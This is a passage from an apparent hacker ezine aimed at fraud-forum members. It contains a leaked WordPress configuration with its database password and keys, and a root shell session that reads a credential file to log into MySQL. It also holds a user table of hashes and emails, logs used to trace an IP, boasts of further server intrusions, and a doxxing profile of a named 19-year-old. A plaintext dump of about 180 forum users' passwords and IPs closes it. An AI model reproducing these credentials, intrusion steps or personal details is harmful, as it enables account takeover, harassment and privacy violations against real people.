* Zu diesen Einstellungen gehören: MySQL-Zugangsdaten, Tabellenpräfix,
* Secret-Keys, Sprache und ABSPATH. Mehr Informationen zur wp-config.php gibt es auf der {@link http://codex.wordpress.org/Editing_wp-config.php
* wp-config.php editieren} Seite im Codex. Die Informationen für die MySQL-Datenbank bekommst du von deinem Webhoster.
*
* Diese Datei wird von der wp-config.php-Erzeugungsroutine verwendet. Sie wird ausgeführt, wenn noch keine wp-config.php (aber eine wp-config-sample.php) vorhanden ist,
* und die Installationsroutine (/wp-admin/install.php) aufgerufen wird.
* Man kann aber auch direkt in dieser Datei alle Eingaben vornehmen und sie von wp-config-sample.php in wp-config.php umbenennen und die Installation starten.
*
* @package WordPress
*/
/** MySQL Einstellungen - diese Angaben bekommst du von deinem Webhoster. */
/** Ersetze database_name_here mit dem Namen der Datenbank, die du verwenden möchtest. */
define('DB_NAME', 'ganymedes_bossm');
/** Ersetze username_here mit deinem MySQL-Datenbank-Benutzernamen */
define('DB_USER', 'ganymedes_bossm');
/** Ersetze password_here mit deinem MySQL-Passwort */
define('DB_PASSWORD', 'ijhdsA/Uh2dsauhdfeksdmfUSDdwn829s');
/** Ersetze localhost mit der MySQL-Serveradresse */
define('DB_HOST', 'localhost');
/** Der Datenbankzeichensatz der beim Erstellen der Datenbanktabellen verwendet werden soll */
define('DB_CHARSET', 'utf8');
/** Der collate type sollte nicht geändert werden */
define('DB_COLLATE', '');
/**#@+
* Sicherheitsschlüssel
*
* Ändere jeden KEY in eine beliebige, möglichst einzigartige Phrase.
* Auf der Seite {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} kannst du dir alle KEYS generieren lassen.
* Bitte trage für jeden KEY eine eigene Phrase ein. Du kannst die Schlüssel jederzeit wieder ändern, alle angemeldeten Benutzer müssen sich danach erneut anmelden.
*
* @seit 2.6.0
*/
define('AUTH_KEY', 'A?1NvyK.$5HH^-R$,Pr)V8~M0-+-Vj3bxUds+{5su`FcN x<7FdcTC0-jDVR_YSq');
define('SECURE_AUTH_KEY', '#1)hl!C`8w9ZcHG(X<-jsv72J3Npz$NvT]p69x6:<@`eZ)H:^hQY*;A_&`,ET=^e');
define('LOGGED_IN_KEY', '+)GL ,SalA}QKsqx:,bbkuEndA/YObB-s^}rs/<3F(oJQOwd2!@h-JU)g/Wgy-uA');
define('NONCE_KEY', 'gp*( -=$-I*,q&Y]oJm<Dwas+|S_z>_irty|#bG+hp@Qj6%qo.-N d.ZnGC=f@`m');
define('AUTH_SALT', 'T|#(IjI)JW%66G(e2S}$k-8/QY.iEfl^/v}PWgtk$@cnw9d)N pAm4A,A.~f+<oO');
define('SECURE_AUTH_SALT', '<1?@.:Q>x_Hc}V^Wi${iO%`$FJb8%~W?$|*l{%$+cK2.{A*ZNW>)~Ht0r,p B[3(');
define('LOGGED_IN_SALT', 'n[Un&54kqxFw|!d]ccfCV5ajNklT`YN/YECk (K2}T{;,0,*!|)ru}/ysPG s$v-');
define('NONCE_SALT', 'cm$vLkM34?(0u}&O)SOp>qCRZq*LJY``ym%-tNFg+MQ^#L{x~@c,d@fCJ27{;d~8');
/**#@-*/
/**
* WordPress Datenbanktabellen-Präfix
*
* Wenn du verschiedene Präfixe benutzt, kannst du innerhalb einer Datenbank
* verschiedene WordPress-Installationen betreiben. Nur Zahlen, Buchstaben und Unterstriche bitte!
*/
$table_prefix = 'wp_news';
/**
* WordPress Sprachdatei
*
* Hier kannst du einstellen, welche Sprachdatei benutzt werden soll. Die entsprechende
* Sprachdatei muss im Ordner wp-content/languages vorhanden sein, beispielsweise de_DE.mo
* Wenn du nichts einträgst, wird Englisch genommen.
*/
define('WPLANG', 'de_DE');
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*/
define('WP_DEBUG', false);
/* That's all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');
/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
# cd ..
# cd el-basar.biz
# ls -laR
total 12
drwxrwx--- 3 ganymedes www 512 Sep 26 22:54 .
drwxr-x--- 5 ganymedes www 512 Oct 5 21:43 ..
drwxrwxrwx 3 ganymedes www 512 Dec 13 2010 85c91o822x3olps1d8179xizbm27
./85c91o822x3olps1d8179xizbm27:
total 12
drwxrwxrwx 3 ganymedes www 512 Dec 13 2010 .
drwxrwx--- 3 ganymedes www 512 Sep 26 22:54 ..
drwxrwxrwx 3 ganymedes www 512 Dec 13 2010 check
./85c91o822x3olps1d8179xizbm27/check:
total 20
drwxrwxrwx 3 ganymedes www 512 Dec 13 2010 .
drwxrwxrwx 3 ganymedes www 512 Dec 13 2010 ..
drwxrwxrwx 2 ganymedes www 6144 Sep 17 13:01 vp2q910pxc2ifo091y
./85c91o822x3olps1d8179xizbm27/check/vp2q910pxc2ifo091y:
total 16
drwxrwxrwx 2 ganymedes www 6144 Sep 17 13:01 .
drwxrwxrwx 3 ganymedes www 512 Dec 13 2010 ..
-rw-r--r-- 1 www www 0 Aug 11 01:55 6337180250025522924
-rw-r--r-- 1 www www 0 Aug 9 19:04 6337180250037669499
...
# Nothing left here anymore :(^C
# Better check the database ...
# cat /etc/my.passwd
bde413a2c8751ac97887f11d6efb2c39
# mysql -u root -pbde413a2c8751ac97887f11d6efb2c39
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 205220
Server version: 5.0.51a-log FreeBSD port: mysql-server-5.0.51a
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> SHOW DATABASES;
+--------------------+
| Database |
+--------------------+
| information_schema |
| alg_forum |
| alg_hide |
| alg_zzz |
| crank2010_forum |
| crimecore_board |
| exchanger_db |
| filip_eldent |
| filip_eldent_ |
| ganymedes_bosscc |
| ganymedes_bossm |
| garf_ban |
| hcgcrew?forum |
| jeka-test_ |
| lordknight_forum |
| lordknight_teon |
| madrage_wbb |
| margosha_forum |
| margosha_sait |
| mmgen_3 |
| mmgen_ref |
| mmgen_shop |
| mr101_old |
| mr101_w3 |
| muraaat_mybb |
| mysql |
| onlineschauen_bi |
| onlineschauen_ho |
| onlineschauen_ma |
| onlineschauen_on |
| onlineschauen_se |
| pavlrse_xshop |
| propiska_gr |
| propiska_us |
| propiska_work |
| scenehack_board |
| snetwork_4g741 |
| snetwork_sh24op |
| szenevz_123 |
| szenevz_db |
| test |
| test4me_db |
| thefuelru_pp |
| useresu1_prava |
| useresu_bollist |
| vsocks_vsocks69 |
| vsocks_vsocks69_ |
| vsocks_vsocks69_a |
+--------------------+
48 rows in set (0.00 sec)
mysql> USE ganymedes_bosscc;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> SHOW TABLES;
+----------------------------+
| Tables_in_ganymedes_bosscc |
+----------------------------+
| admin_navi |
| navi_de |
| news |
| produkt_gruppen |
| produkt_items |
| produkte |
| psc |
| support |
| supporter |
| supporter_group |
| ukash |
| users |
+----------------------------+
12 rows in set (0.00 sec)
mysql> SELECT count(*), sum(guthaben) FROM psc;
+----------+---------------+
| count(*) | sum(guthaben) |
+----------+---------------+
| 74 | 1080 |
+----------+---------------+
1 row in set (0.00 sec)
mysql> # Not bad ...
mysql> SELECT count(*) FROM users;
+----------+
| count(*) |
+----------+
| 1359 |
+----------+
1 row in set (0.00 sec)
mysql> SELECT * FROM users WHERE guthaben > 1;
+------+----------+------------------------------------+----------------------+-----------+----------+--------+
| id | username | pass | email | reason | guthaben | access |
+------+----------+------------------------------------+----------------------+-----------+----------+--------+
| 1 | blamedyy | ==44c8cf514440543c728bee1864a1a466 | blamedyy@yahoo.com | | 897 | 1 |
| 474 | hung2304 | ==2864d82ad1e49fffcafe85976c602868 | jidar@hotmail.de | faked psc | 8 | 33 |
| 485 | SlamD | ==65259faf801899cfd1f27b389b8849ac | arx2@gmx.net | | 3 | 0 |
| 555 | AEQUITAS | ==ee61e9fd8caafb735406838f18235281 | aequitas@z1p.biz | | 3 | 0 |
| 618 | Jettic | ==a1eba8157beb255a503e8b586e141b61 | jettic@mail.ru | | 3 | 0 |
| 634 | me2 | ==cfbf7976666e981d217cfed255d7db6e | fff8756@yahoo.de | | 3 | 0 |
| 640 | riddick | ==24217c603630ce2339503db1d009b8c7 | riddicker1@web.de | | 3 | 0 |
| 817 | Hilli | ==8e6a108a6555e604f9f652d679c7ab29 | shiva166@web.de | | 2 | 0 |
| 865 | killersm | ==6b8daaab17c40f5fbf9aab0db8dc21bf | jhir@jire.de | | 3 | 0 |
| 875 | skilled | ==195b9d5a1e7d2ef7237eb467533ec1f2 | sk@sk.com | | 3 | 0 |
| 943 | FatJoe | ==ed35e0bc4b6a22cd24f74e039533276f | sedaephi@emailgo.de | | 2 | 0 |
| 963 | Bogner | ==b3a0ad39806aced9241a80b9a11868e4 | placebo84@hotmail.de | | 3 | 0 |
| 971 | keks | ==572330601360f7945006cae2ea549bab | aggroberliner222@web | | 3 | 0 |
| 975 | saidone | ==aba11e56813d842283854c6ccccbef60 | saytec@gmx.de | | 3 | 0 |
| 1022 | lczero | ==37d1475d60b2c99b1c222a5a5acc2c58 | sdpfmodpmgg@web.de | | 3 | 0 |
| 1094 | peterpan | ==fdc6b6d13338d1b9f1099dcec97cb2a8 | tfmpp1@web.de | | 3 | 0 |
| 1261 | Tommy | ==7d01922eeaeb9682953c49fd20ece458 | tomdanger@rbcmail.ru | | 3 | 0 |
| 1443 | 2345176 | ==9ddfac889552a0cdf635e46c8c70b01b | b2121870@prtnx.com | | 3 | 0 |
| 1466 | badboy44 | ==3fa46350e1a9aa6f09a32cb342eb8c31 | anja_ludi@web.de | | 3 | 0 |
| 1484 | delphin | ==7b8d81c371ada9fd93a448c7ac45b346 | asdgasd@asdga.de | | 3 | 0 |
| 1494 | booom | ==ee6c8e07eed464a4842c2335b4977309 | jhghj@gggh.de | | 3 | 0 |
| 1512 | tetrispr | ==1e63fa4217770660acccbcf4acabfc67 | tatakiru@gmx.de | | 3 | 0 |
| 1513 | stage6 | ==660d11767f02a3a7403bfe47954de520 | carders@hotmail.de | | 3 | 0 |
| 1586 | m1sc | ==1d28ce4b9ff02e4a08432036f7316db1 | m1sc@gmx.de | | 3 | 0 |
| 1619 | anubis | ==dda9ab9768f7367198227e69b83cedbd | xAnuBiSx@gmx.de | | 3 | 0 |
| 1671 | carlos | ==2a363b531b95578a7d816dd02cde60d6 | carlos---@live.de | | 3 | 0 |
| 1715 | advanced | ==924f32ec3a868e5555ee1910d4242ce1 | advanced@gnx.de | | 3 | 0 |
| 1719 | Blizzard | ==74281aac5624b24fb3472feab558a5d1 | kgadkhagj@spambob.de | | 2 | 0 |
| 1735 | ripit | ==eed34671e873f2aa07d30d878f182ce0 | ripit@mailinator.com | | 3 | 0 |
+------+----------+------------------------------------+----------------------+-----------+----------+--------+
29 rows in set (0.00 sec)
mysql> Aborted
There we got one of Ganymedes' other accountnames and his email:
blamedyy@yahoo.com. We better check out some proftpd logs. Ganymedes
constantly used proxies, but there is one login sequence where he did
not:
# grep 93.232.*ganymedes proftpd-transfer.log
Mon Jan 24 15:34:21 2011 0 212.117.174.26 0 /home/ganymedes/el-basar.biz/85c91o822x3olps1d8179xizbm27/check/vp2q910pxc2ifo091y/6337180258293023293 a _ d r ganymedes ftp 0 * c
Mon Feb 07 02:04:40 2011 0 93.232.193.137 2416 /home/ganymedes/el-basar.biz/designe/design/navi.php a _ o r ganymedes ftp 0 * c
Mon Feb 07 02:04:45 2011 0 93.232.193.137 1709 /home/ganymedes/el-basar.biz/designe/design/title_gh.php a _ o r ganymedes ftp 0 * c
Mon Feb 07 02:09:23 2011 0 93.232.193.137 1917 /home/ganymedes/el-basar.biz/co2xcpqwlvxmi/config.php a _ o r ganymedes ftp 0 * c
Deutsche Telekom AG, NRW, Germany. Well done kid.
,;~;,
_/\
\ )
(\\ ())
/';;,, // |
-------==={ The Happy Ninja Faker }===))))))))))))))=m( )_ __
| ,(.' '~/()' ' '\
Some of you guys might have noticed that a ~ | ||( );,
"HappyNinjas" Twitter account has been created ( ,;.)-\ / ';,
on the 4th or 5th February 2011 which seemed \ ( \ (
to offer the opportunity to receive the latest || \\
news regarding our actions. As we observed this /_( /_(
account got some attention and even obtained nearly 100 followers.
Hurray. However it isn't ours :( To get more publicity the creator
also published a fake zine called exp04.txt at
http://www.pva-apeldoorn.nl/exp04/exp04.txt. It was very clear that
the person didn't do this to help us or fight the fraudscene, but to
spread lies. So we did the only logical thing: We hacked that server
too, removed the fake and copied some logs. Here are some excerpts:
2011-02-10 16:19:24 W3SVC4579 SOHOSTED07 195.8.208.38 GET /exp04 - 80 - 91.211.117.25 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+6.1;+de;+rv:1.9.2.13)+Gecko/20101203+Firefox/3.6.13 - - 301
0 0 370 399 500
2011-02-10 16:19:26 W3SVC4579 SOHOSTED07 195.8.208.38 GET /exp04/index.html - 80 - 91.211.117.25 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+6.1;+de;+rv:1.9.2.13)+Gecko/20101203+Firefox/3.6
.13 - - 200 0 0 316 400 687
2011-02-10 16:58:53 W3SVC4579 SOHOSTED07 195.8.208.38 GET /exp04/exp04.txt - 80 - 91.211.117.25 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+6.1;+de;+rv:1.9.2.13)+Gecko/20101203+Firefox/3.6.
13 - http://twitter.com/ 304 0 0 236 527 296
Whups, looks like someone did a messy job there. Well, at least he
used a proxy. But after some black magic we also hacked the proxy and
it showed us the right way to payback. So who did this lousy job, you
may ask? Noone else but 3lite aka InVisible, (former) moderator and
admin of several fraud orientated message boards. It wasn't hard to
find more information about him, right Robin?
To understand why someone would do such things we first have to
understand who he is. Robin is 19 years old and comes from a typical
middle class family. Both parents are employed, the father as an
administrative official, the mother as an industrial clerk. He also
has three sibs. His family consists of baptists (a crazy sect, calm
but annoying), thus it is not really surprising that his mother also
spends way too much money on esoteric medicine. I guess if you can
believe in the biblical history of creation you can believe in
anything. His education started at the grammar school (Gymnasium) in
2002. After two wasted years he switched to middle school
(Realschule). Three years later he had to switch again, this time to
secondary modern school (Hauptschule). The story of his life. This
year he finished technical college (Berufsfachschule) with a rather
bad grade. In his virtual life he mostly works with botsoftware,
infects people and sells the stolen data to other fraudsters. In other
words: he is a trojan skiddy. Sounds like a bored, unmotivated child
without much talent and that is exactly what he is.
He used more than ten different nicknames in the past, because after a
while they all had a very bad reputation. And that are only the names
we know about, there are probably more.
_ _____________________ _
| | | |
|b| Deoxys |b|
|o| Aerodactyl |o|
, |x| Raid0n17 |x|
(@| | | DeoOxygen | |
,, ,)|_____|o| ExplosiV / ExplOsiv |o|_______
//\\8@8@8@8@8@8 / _ _ |f| Androx |f| _ _ _ \
\\//8@8@8@8@8@8 \_____| | 3lite / 3lite2k11 | |_______/
`` `)| |s| Raiden |s|
(@| |h| »InVisible |h|
|a| R@ven |a|
|m| Fr33w4re |m|
|e| VexX |e|
|_|_____________________|_|
If you want to check him out yourself, here are some links. More
information can be found in the attached files.
http://www.youtube.com/Raid0n17
http://www.youtube.com/DeoOxygen
http://aerodactyl.wordpress.com/
http://steamcommunity.com/profiles/76561197968670011
He loves to use variations of "1337" and "troll" as his passwords.
Very secure, you should give it a try.
Our conclusion: This guy is really fucked up. He is a pathological
liar, a deadbeat, a scammer. Avoid him if you can.
Side note: The following two texts have already been published by us,
because the given circumstances forced us to in that time. Since both
texts have not made it into an "official" ezine yet, we decided to
print them here. Have fun!
,;~;,
/\_
( /
(() //)
| \\ ,,;;'\
__ _( )m=((((((((((((((======={ Swissfaking.net }=====-------
/' ' '()/~' '.(, |
,;( )|| | ~ Swissfaking.net has not been in the center of
,;' \ /-(.;, ) our interest for long, mainly because one doesn't
) / ) / hear a lot about it. From the outside they just
// || seem to be a small board, not any worse than
)_\ )_\ the average kiddyforums.
However, when looking at it closely, one notices that swissfaking
manages to fully compensate for their size with the most shrewd users.
These peoples' only interest seems to make money. Lots. Fast. No
matter what. Swissfaking consider themselves a very special community;
that's why the registration has been closed since 2009 and replaced by
an invite system. Under these circumstances one would not expect great
activity in the forums, though as we first logged in, we were
bombarded with piles of blinking flash ads. The most ridiculous one
was probably that of some fag selling credit cards.
____________________________________________________________________
| __ __ |
| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. |
| | _ | | | _ || _| -__|| _ | _ |_ _| |
| |__ |_____|_____||____|_____||_____|_____|__.__| |
|________|__|________________________________________________________|
| |
| d3adline: |
| You want buy without any risks? You want fast car? You want hot |
| girls? You want have glamorous partys? Then buy ccs from d3adline |
|____________________________________________________________________|
This again shows pretty well how ignorant those fucks are; as if a
credit card brought you from mom's basement to high life. Just because
the majority of swissfaking's users probably suffer from the same
mental disease as the mister quoted above, we have prepared a
treatment, but wait, before we start, here are Username:plain
password:IP:logintime of almost all users:
p5n:@Copy10cv:91.89.69.182:January 2, 2011, 9:24 pm
mcdrive:belinea:188.23.69.210:January 2, 2011, 11:19 pm
n3ro:LbiI:{mq>K kZä<K[RQz*5\:77.181.45.137:January 3, 2011, 5:08 pm
thc2010:SICKboy2010:64.9.156.229:January 3, 2011, 12:06 am
kargo.kr:PKRV50:88.77.6.25:January 3, 2011, 9:51 pm
karom:hotelteller:91.46.1.37:January 3, 2011, 1:10 pm
smokingred:smokingred1985:93.217.96.252:January 3, 2011, 1:37 am
webdevil:Ag3n SWISS:91.19.104.254:January 5, 2011, 12:48 pm
larifka:123$%&/Is:85.235.31.248:January 2, 2011, 10:21 pm
razade:blutbad:80.145.149.244:January 2, 2011, 9:01 pm
masterblade:morpheus33:89.204.153.251:January 4, 2011, 12:22 am
kra!z0r!x:5%Ö\h/{W)l:80.226.20.162:January 2, 2011, 10:24 pm
n0f3ar:chaoskate2104:93.222.26.148:January 3, 2011, 2:33 pm
st3ffl0r:1989WarCraft1:84.60.197.233:January 2, 2011, 9:54 pm
c4rd3t:carden:184.168.193.21:January 3, 2011, 5:21 pm
ciwan:swiss89:46.59.135.66:January 6, 2011, 2:30 am
schmidx01:Knm7rSQm:178.3.187.31:January 3, 2011, 7:21 pm
jintonic:fisch123:79.218.165.84:January 3, 2011, 2:34 pm
blackmatrix:18112001a:93.130.99.106:January 2, 2011, 9:14 pm
b0lk:never4you:213.186.121.4:January 4, 2011, 10:06 pm
injector1337:testpw:91.52.241.204:January 3, 2011, 6:59 pm
jaheira:qwertzu88:79.218.244.214:January 2, 2011, 9:33 pm
fake:789yxc456v:212.117.172.231:January 2, 2011, 9:14 pm
bullddoser:llg(86543=(6zrXRDPNVD2ße:46.115.37.209:January 3, 2011, 12:20 am
lonelywolf:16156560:91.65.72.63:January 3, 2011, 5:28 pm
korg2009:98600599:92.201.105.116:January 3, 2011, 3:18 pm
stecher:-meinauto2010-:88.73.20.31:January 2, 2011, 11:36 pm
breadfish:bread123:184.107.26.91:January 4, 2011, 1:38 pm
soxtexo12:fcaugsburg07:93.135.18.113:January 2, 2011, 10:38 pm
petrisun:SahneSchnitte1855!!!:77.187.31.76:January 3, 2011, 1:23 pm
flod0:ollum123:79.204.172.231:January 3, 2011, 10:42 am
fr3ak190:pown3d100%:92.241.165.69:January 3, 2011, 2:45 pm
chimsus:free4you4free:79.226.166.136:January 2, 2011, 9:09 pm
cchesk:123456a :91.10.77.30:January 3, 2011, 8:27 pm
diggix:gummiboot:92.117.55.104:January 2, 2011, 11:16 pm
sperle:$%er87qw:88.130.174.181:January 2, 2011, 10:16 pm
crypther:weissnicht1:77.10.228.141:January 2, 2011, 9:02 pm
h1xx3r:fucker:84.23.74.92:January 3, 2011, 2:22 pm
fame.de:k7vt2k7vt2:93.217.161.47:January 5, 2011, 10:06 pm
penis17:g9$nGC0=/Rf6i:84.19.169.232:January 2, 2011, 9:58 pm
gulideckel:1q2w3e4r5t:77.58.105.102:January 2, 2011, 9:40 pm
fallsbay:pleasure:95.211.10.25:January 3, 2011, 10:03 pm
cracker:nokia:95.208.188.115:January 3, 2011, 12:47 am
flashkill:kuschel123:84.175.201.137:January 2, 2011, 9:19 pm
lczero:!1ifckusogothebaum:95.211.13.145:January 3, 2011, 7:16 pm
blackbez:frozen44:217.114.211.242:January 5, 2011, 4:13 am
qobi:g-star7:85.176.71.3:January 3, 2011, 6:32 pm
can:qaywsx:91.121.82.175:January 3, 2011, 1:59 am
hammerhalde:!tsh4mmersh0t8(1!:109.192.225.71:January 2, 2011, 10:06 pm
optiker:serakaya:188.97.205.230:January 3, 2011, 6:16 pm
jokajoka:fardfard:213.3.11.190:January 3, 2011, 9:07 pm
nootwehr:skater11:61.220.57.86:January 7, 2011, 12:30 am
toco:banzai555:87.79.172.32:January 3, 2011, 1:32 pm
scylla:loslos123:96.52.178.186:January 3, 2011, 11:16 pm
3n3my:hawara2611:77.242.73.40:January 2, 2011, 10:39 pm
beelzemon:eugen0889:109.192.53.149:January 3, 2011, 1:02 am
cine:cine1:188.103.1.137:January 4, 2011, 11:41 pm
siedlaa:robin1994:85.2.107.225:January 3, 2011, 10:06 pm
bugsy:medion12:93.128.66.34:January 2, 2011, 11:22 pm
nero:Dennis123!!:93.245.205.131:January 2, 2011, 10:08 pm
senfi:AdrianPSP:178.198.73.249:January 2, 2011, 9:40 pm
vapo:rootystar:95.211.99.92:January 3, 2011, 7:46 pm
illegalimmigrant:GncNMf9h:94.100.31.74:January 3, 2011, 1:41 am
alpha21:klasnic321:84.137.120.110:January 2, 2011, 9:12 pm
hackthenet:Pannewitz:88.134.94.217:January 2, 2011, 10:00 pm
phant0m:r992uO_f)vrHS}44*C&st$:92.241.164.54:January 2, 2011, 9:42 pm
criston:dinosauria1234:77.180.51.115:January 3, 2011, 1:42 pm
kingtph:superflieger:93.193.94.186:January 3, 2011, 12:57 am
pinto:malaka:84.177.81.175:January 3, 2011, 12:13 pm
zet:xFfFG6zF:93.199.171.214:January 2, 2011, 11:17 pm
conax:sojkagmbhdigitaldruck:212.117.162.192:January 2, 2011, 10:18 pm
syntax:seckin!kilic91:85.181.19.164:January 3, 2011, 3:08 pm
theana1yst:selfmade:80.187.246.158:January 3, 2011, 8:41 am
maury:2408821982:79.7.13.209:January 2, 2011, 9:46 pm
7inch:Rasta1!:87.186.114.153:January 3, 2011, 1:22 pm
kaiz0r:derbisenda:80.254.75.59:January 3, 2011, 12:24 pm
east0n:Swiss2010!:93.190.142.49:January 3, 2011, 12:48 pm
killbill:123456mm:88.64.128.57:January 3, 2011, 8:53 pm
bugzy:london1010:41.206.12.2:January 4, 2011, 11:21 pm
marrs1:26081989:91.66.246.96:January 3, 2011, 2:57 am
fickmaus:9N#oJa/yCr.tsb^<aoJa1~R\dKd&t:84.19.169.165:January 2, 2011, 10:29 pm
thunbird:gentleman:92.241.190.253:January 3, 2011, 1:07 pm
rechman:megaman12345:188.98.33.38:January 3, 2011, 3:06 am
creative:Tempo.4tw.:217.227.191.210:January 2, 2011, 9:37 pm
rich91:youngmoney:78.94.4.246:January 2, 2011, 10:38 pm
sinshou:bananekopf26%:92.192.111.112:January 2, 2011, 10:21 pm
romulus:acer89:80.123.46.94:January 2, 2011, 9:12 pm
$p45ch4$:bigrick1:92.241.168.20:January 5, 2011, 2:49 am
nakman:jakobina0067vs:77.177.19.207:January 2, 2011, 10:25 pm
nadas:kostenlos12:77.188.71.188:January 6, 2011, 12:41 am
and1player:passwort44:83.170.95.133:January 2, 2011, 11:21 pm
rubberduck:jasmin2:202.60.66.32:January 6, 2011, 3:33 am
aggron:virago125:84.171.99.233:January 3, 2011, 11:07 am
tsd:123456:77.8.195.232:January 2, 2011, 9:46 pm
sinned:cocacola:91.57.54.91:January 3, 2011, 12:00 am
xaaser:jaynaltin:87.78.67.4:January 2, 2011, 9:17 pm
k0ptix:icke10115:95.211.99.92:January 4, 2011, 3:51 pm
klempner:PoKeMoN2000:93.197.176.43:January 3, 2011, 12:38 pm
bigdog:mamice:88.134.112.111:January 5, 2011, 9:19 am
m4.ch:P0r744lp:95.208.135.191:January 2, 2011, 9:07 pm
123x321:000000:88.117.58.97:January 6, 2011, 6:04 pm
happyfree:313100:41.102.244.158:January 3, 2011, 11:07 pm
flearuns:dh2ed3h:93.203.162.123:January 3, 2011, 2:28 am
knaufo:icqicq:79.205.172.197:January 2, 2011, 11:16 pm
kranker:flakfeuer:217.236.156.115:January 2, 2011, 9:48 pm
shygo:462813795W.wq:88.153.192.142:January 4, 2011, 2:25 pm
x3r0x:0106080d:77.177.37.25:January 2, 2011, 11:32 pm
j0k3r:xhodon:77.12.19.10:January 4, 2011, 5:47 am
ratchet:chrisi!sf99:92.192.36.78:January 4, 2011, 4:40 pm
nyd:swissfuck888:80.226.44.156:January 3, 2011, 11:03 am
usenext:masterminds:77.177.37.25:January 3, 2011, 1:28 am
luxx!z:mattrex123:178.162.185.151:January 2, 2011, 11:30 pm
darkfunny:Master1993:94.220.255.219:January 5, 2011, 4:31 pm
jaksa:mama5448:91.54.81.152:January 3, 2011, 2:46 am
sinobis:!1337!:79.213.236.37:January 2, 2011, 9:11 pm
dd7:perler123:92.226.209.196:January 3, 2011, 12:53 am
scoz:sucked77:87.118.116.196:January 3, 2011, 6:51 pm
pukker:100200300:217.88.224.247:January 3, 2011, 10:02 pm
midi23:netgear:178.5.13.28:January 3, 2011, 4:15 pm
daddy:92kev!n19:87.144.71.86:January 3, 2011, 7:57 am
scriptcheck:script2501:84.157.41.158:January 6, 2011, 4:58 pm
h00:stups!050590:78.49.11.25:January 3, 2011, 12:31 am
hans-wurst:volkan95:92.76.11.157:January 2, 2011, 10:39 pm
knuff:111111:77.181.139.1:January 4, 2011, 4:51 pm
2slow4u:qWeRtZuIoP!"§$%&/()=?90:79.238.143.241:January 2, 2011, 10:29 pm
kenzoo:ganja:84.46.30.136:January 2, 2011, 9:05 pm
pascal1988:pacimaster:93.193.198.152:January 6, 2011, 4:47 pm
the|biggie:Qu<oyJv]Xc$gfd4k:62.224.132.166:January 2, 2011, 9:12 pm
cr4ck:iloveswiss:80.226.190.48:January 2, 2011, 9:41 pm
james:schulen:79.194.61.50:January 4, 2011, 2:40 pm
clx:fischer:88.74.186.72:January 2, 2011, 9:45 pm
bonbergol:Calabria:82.83.226.27:January 2, 2011, 9:53 pm
russka:connection:212.117.174.26:January 2, 2011, 9:07 pm
hiddencell:sfhc123!:94.220.165.4:January 2, 2011, 9:19 pm
rockz:laola123:77.0.211.178:January 3, 2011, 7:31 pm
rollmops:undesistghetto:92.241.165.69:January 3, 2011, 2:08 am
deinemudda:dickenberg:80.187.102.194:January 3, 2011, 4:07 pm
carsi93:sikicisemih93:91.60.76.140:January 5, 2011, 8:56 am
tricktrick_09:elyts123:188.195.241.141:January 3, 2011, 11:57 am
donnie:12344321:79.239.111.51:January 2, 2011, 10:50 pm
1llegal:zuhälter:188.107.121.32:January 2, 2011, 9:23 pm
freewolf:EliSSa1!:188.106.177.73:January 4, 2011, 12:36 am
cobega:you64control:95.143.192.159:January 4, 2011, 12:09 am
lan-kabel:rchbpf1567kb5q1337yo:94.216.194.53:January 2, 2011, 9:54 pm
nightwalker:123123:87.153.145.248:January 5, 2011, 7:57 pm
luca:Reiterbogen01:95.143.192.159:January 2, 2011, 9:41 pm
dr.med.den.rasen:Google.de/12:77.3.161.91:January 5, 2011, 6:37 pm
lynex:a1zb9ky95:178.199.76.95:January 3, 2011, 5:04 pm
boterkid:147896325:95.89.159.72:January 2, 2011, 10:08 pm
cangria:Ch4xt0r11:92.241.184.61:January 6, 2011, 1:54 am
me.:sa06bi02ne:84.60.186.200:January 2, 2011, 11:14 pm
sidneyland:sidney12:87.165.220.205:January 3, 2011, 3:27 am
badboypole:rapidsharehp1:212.117.162.192:January 3, 2011, 2:40 pm
racketeer:neumsche:95.211.99.91:January 2, 2011, 10:44 pm
hearts:deutschland:212.117.172.231:January 6, 2011, 1:30 am
jaro:ichstinke:80.140.2.165:January 5, 2011, 1:19 am
mehmet14:hass:89.13.128.117:January 2, 2011, 10:05 pm
eldiablo:eldiablo315:78.42.155.69:January 3, 2011, 8:51 pm
dv1980:dv19801980:84.44.191.37:January 6, 2011, 8:31 pm
ppp:jockel)!"//:80.226.20.125:January 4, 2011, 11:10 am
delirion:gericom:87.118.120.182:January 3, 2011, 10:36 pm
h3c70r:julia1337*:95.89.153.7:January 3, 2011, 6:01 am
blacki:13371337:87.123.146.89:January 3, 2011, 11:19 am
chiko:yarakmarie:92.76.254.240:January 3, 2011, 1:08 am
nookiey00:scene123:93.201.204.220:January 2, 2011, 10:43 pm
kdkdkd:7UKpQ$ü0:85.177.151.43:January 2, 2011, 10:22 pm
bloody:faq4m2swiss:86.56.41.39:January 2, 2011, 9:47 pm
typ:Klasfu23980asfnkla9sf8halskgansg25g:84.186.61.95:January 2, 2011, 9:21 pm
mortalcookie:8Nj6aAh5(=):91.18.231.18:January 2, 2011, 9:05 pm
paloxus:Hallo123:89.217.44.141:January 4, 2011, 9:50 pm
edd18:Oceansday090291qw:88.134.175.46:January 2, 2011, 9:28 pm
wounder:Deneme^92:88.74.100.221:January 5, 2011, 3:29 pm
impaled:rap3isfun:79.233.199.226:January 3, 2011, 1:52 am
siek:hallohallo:77.186.96.171:January 2, 2011, 9:05 pm
terror:PureHate.030:95.89.47.120:January 6, 2011, 11:36 pm
ra-re:ujmko44:93.231.130.78:January 3, 2011, 5:36 pm
hotfuzz:C1V2X3:80.136.162.78:January 2, 2011, 10:31 pm
heins12:JanQ!W"E§R$jan:62.143.165.130:January 3, 2011, 12:17 am
psychosomasis:ts450245622:95.223.105.235:January 3, 2011, 9:27 am
